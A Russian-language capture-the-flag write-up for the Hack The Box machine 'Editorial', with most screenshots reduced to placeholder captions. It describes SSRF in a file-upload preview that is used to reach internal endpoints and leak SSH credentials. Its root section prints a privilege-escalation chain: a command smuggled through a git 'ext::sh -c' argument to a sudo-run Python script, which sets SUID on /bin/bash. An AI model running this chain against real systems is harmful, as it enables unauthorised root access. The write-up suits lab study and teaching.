Editorial HTB Writeup

Описание изображения

Ссылка на тачку HTB:

https://app.hackthebox.com/machines/Editorial

Разведка Ссылка на заголовок

Для начала, как обычно, сканируем целевой хост nmap-oм

Описание изображения

Из вывода узнаем название домена - editorial.htb

Просто так зайти не получится, нужно добавить запись в /etc/hosts

Описание изображения

Это можно сделать одной командой

sudo echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts

Описание изображения

Теперь на сайт можно зайти

Описание изображения

User flag Ссылка на заголовок

Сразу бросается в глаза функционал загрузки файлов

Описание изображения

При нажатии на кнопку “Preview” получаем такой запрос:

Описание изображения

Попробуем ввести свой IP, на котором мы предварительно запустили прослушиватель командой nc -nlvp 4444

Описание изображения

Получаем отстук, похоже у нас тут SSRF уязвимость

Описание изображения

Попробуем теперь обратиться к внутреннему IP

Описание изображения

При скачивании сгенерированного файла, можно увидеть внутренние эндпоинты

Описание изображения

В одном из таких эндпоинтов лежат креды от ssh

Описание изображения

Описание изображения

С ними можно подключиться к тачке и залутать User flag

Описание изображения Описание изображения

Root flag Ссылка на заголовок

bash -p
cd /root
cat root.txt

Описание изображения

Или, если до вас на тачке никого не было, делаем так:

grep -r "prod" ./

Описание изображения

cd ./apps/.git/logs

cat HEAD

Описание изображения

git show 1e84a036b2f33c59e2390730699a488c65643d28

Описание изображения

Описание изображения

echo '#!/bin/bash' > /tmp/exploit.sh 

echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh  
  
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"  
  
ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 11:31 /bin/bash  
  
/bin/bash -p  
bash-5.1#